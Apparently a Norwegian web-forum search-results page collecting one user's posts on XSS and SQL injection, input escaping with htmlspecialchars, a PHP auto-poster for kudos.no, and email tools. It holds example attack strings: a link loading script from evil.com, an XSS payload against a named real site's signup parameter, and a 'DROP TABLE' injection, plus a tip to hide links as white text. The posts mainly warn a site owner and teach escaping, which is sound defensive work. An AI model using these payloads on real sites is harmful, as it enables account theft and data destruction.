Søkeresultater

Sendt linker? Du trenger jo bare å lenke til de selv. Så kan du skjule lenken ved å bruke hvit lenketekst f.eks.

DROP TABLE tbl_innhold I mysql går det ikke an å ha mange querys i en spørring. Menne likevel går det an å hente ut hele databasen, noe som er skummelt. Men du blander mellom xss og sql injection. Det vi egentlig snakker om her, er hvordan forhindre alle typer angrepsklasser.

Nei jeg mener om url er fucket opp på forumet her, som det er på bildet. Burde derfor kanskje ha postet lenke til der det er fucka opp til meg: https://www.webforumet.no/forum/produkter-og-verkt-y/6158-automatisere-kudos-no-og-lignende.html#post52221

http://bildr.no/image/472966.jpeg Som dere ser på bildet blir de norske bokstavene i urltittelen fucka opp. Er det slik til dere også?

Lager det som et enestående php script, der man fyller inn i et skjema og trykker "submit". Dermed legges saken inn automatisk siden brukernavn og passord er hardcoded inni php koden. Men dette kan vel enkelt kjøres ved bruk av en plugin. Er jo bare å kjøre koden idet et blogginnlegg blir...

Driver nå og skriver kode som logger inn på kudos.no, og legger inn det du har fylt inn automatisk. Når jeg er ferdig med kudos skal jeg ta for meg de andre nettstedene. Slik kan vi spare masse tid om man har mange sider, og skriver endel artikler man vil legge ut på sider som kudos.no osv...

All data som "the current" database bruker har tilgang på, kan man ved sql injection hente ut. Så hvis brukeren har tilgang til mysql databasen "mysql.users", kan også bruker og passord til selve mysql databasen også hentes ut. Som oftest er passord i databasen kryptert. Men om du bruker...

Om det ikke fins noe admin eller bruker login på nettstedet ditt. Kan xss aldri skade/endre ting på serveren. MEN Ting kan endres. Man kan f.eks. sende vedkommende en lenke slik: http://vg.no/?article34434&a="<script src=http://evil.com/a.js></script>" Den ser mistenkelig ut, men den...

Det heter for "sql injection". Det vil si at jeg kan laste ned hele databasen din om jeg vil. Det inkluderer passordene. Så hvis man får tak i passordet, kan man logge inn som admin og fucke opp? Hvis det fins et admin panel da.

Ah den ser jeg. En ulempe med å vaske innput blir da at informasjonen i databasen blir større og tar mer plass. Og det kan skape problemer hvis et felt har maks grense på f.eks 10 bokstaver, og vaksingen fører til at strengen blir lengre enn 10 tegn.

Hvorfor trenger man egentlig å vaske inndata som settes inn i en database? Kan man ikke bare gjøre det på utdata? Da tenker jeg på html koder. Tegn som kan manipulere en sql query må selvfølgelig vaskes før den brukes i en query.

PHP: htmlspecialchars - Manual Denne sørger for at <h1> ikke blir tolket som html kode, men <h1> blir printet ut, slik at du ser <h1>. Men den oppfører seg ikke som html kode. ENT_QUOTES sørger for at anførselstegn( " ) også blir skrevet om, slik at den mister betydningen sin i html kode...

Som jeg skrev lenger oppe: $ref = htmlspecialchars($input, ENT_QUOTES);

Det har ingenting med cpanel å gjøre :P Det er sikkert fristende å bare drite i det jeg sier. Men jeg anbefaler deg virkelig å gjøre noe med det. Om siden din får noen hundre medlemmer, er det alltids en tosk med datakunnskaper som vil ødelegge.

Når jeg sier input mener jeg alt et mennesket kan skrive på dine web skjemaer og via urls i GET. Hvis du skal printe ut denne informajsonen med f.eks. echo $yo, så må du huske å ta vekk html koder, og meta tegn som f.eks. " og '. Er det du som har skrevet php systemet på siden? Og ikke har...

Ved å la javascript kjøres på nettsiden din, er det mulig å stjele andre brukere sin konto osv. Om du vil vite hvorfor det er slik må du belage deg på mye lesing. søk på "xss"

http://norge.gaveland.com/signup.php?ref=kek" onmouseover=alert(6)//"> Slike feil kan føre til at kontoer blir stjelt osv. Bruk denne på all inut som printes ut. Eks: $ref = htmlspecialchars($input, ENT_QUOTES);

$body = utf8_decode($body); $subject = utf8_decode($subject); Jeg gjorde dette, og problemet ble løst.

Ja, men er mye kulere om det fins noe gratis. Så slipper man å bruke tid. Unødvendig å finne opp hjulet flere ganger :P

Et gratis et sådan, hvor jeg kan sende ut email til alle om jeg vil. Og en slik periode funksjon, slik at etter vedkommende registrere seg får han en email hver dag, som i et 7 dagers kurs f.eks.